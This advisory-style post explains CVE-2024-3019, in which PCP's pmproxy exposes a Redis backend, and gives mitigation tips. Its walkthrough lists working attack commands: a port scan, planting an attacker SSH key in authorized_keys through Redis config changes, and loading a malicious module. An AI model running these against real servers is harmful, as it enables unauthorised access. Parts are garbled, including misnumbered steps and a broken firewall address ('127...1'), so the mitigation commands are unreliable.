CVE-2024-3019 - RCE via Exposed Redis in PCP pmproxy – How It Works and How to Stay Safe

CVE-2024-3019 is a newly disclosed security issue in Performance Co-Pilot (PCP), a popular performance monitoring framework widely used on Linux servers. The bug allows remote attackers to execute commands by exploiting how pmproxy exposes a Redis server backend to the local network.

If you’re running PCP 4.3.4 or newer and have the pmproxy service running (which users often enable in Cockpit's Metrics settings), you may be at risk if the Redis backend is accessible from the network.

How Does the Vulnerability Work?

By default, if you manually start the pmproxy service, the service may expose its Redis backend to the local network. If an attacker can connect to this Redis instance, they can execute arbitrary Redis commands — and potentially escalate to remote command execution (RCE) as the user running Redis.

Attacker has network access to pmproxy's Redis

> Note: pmproxy is NOT running by default; it must be started manually, often via Cockpit.

Exploit Walkthrough: Step by Step

Here’s a simple demonstration of how an attack could happen.

1. An Attacker Scans for Open Ports

nmap -p 6379 <target-ip>

If port 6379 (Redis) is open and reachable to the attacker, it’s a red flag.

The attacker connects with redis-cli or netcat

redis-cli -h <target-ip> -p 6379

3. Remote Command Execution via Redis Misuse

A common Redis exploit involves writing to files or using Redis's module or configuration features.

Example: Using Redis to Write an SSH Key (if running as the right user)

echo -e "\n\nssh-rsa AAAA... attacker@attacker\n\n" > foo.txt
cat foo.txt | redis-cli -h <target-ip> -x set crackme
redis-cli -h <target-ip> config set dir /var/lib/redis/.ssh/
redis-cli -h <target-ip> config set dbfilename "authorized_keys"
redis-cli -h <target-ip> save

Now, if Redis is running as a user who can SSH or with insecure file permissions, the attacker may gain access.

If the attacker can load a malicious module

redis-cli -h <target-ip> MODULE LOAD /tmp/exploit.so

Note: The actual exploitability depends on how Redis is run (user permissions, SELinux, etc).

Reference Links

- PCP official site
- Cockpit Project – Metrics
- Red Hat Bugzilla – CVE-2024-3019
- Redis Security Docs

Add a firewall rule to block remote access to Redis

`bash

sudo firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="127...1" port port="6379" protocol="tcp" accept'

`

4. Update PCP as soon as a patch is available (check here).
5. Review your Cockpit interface: Make sure Metrics/pmproxy services are not enabled unless required.

Key Takeaways

- CVE-2024-3019 can let attackers run commands via an exposed Redis backend on systems with pmproxy running.

Timeline

Published on: 03/28/2024 19:15:49 UTC
Last modified on: 04/30/2024 20:15:08 UTC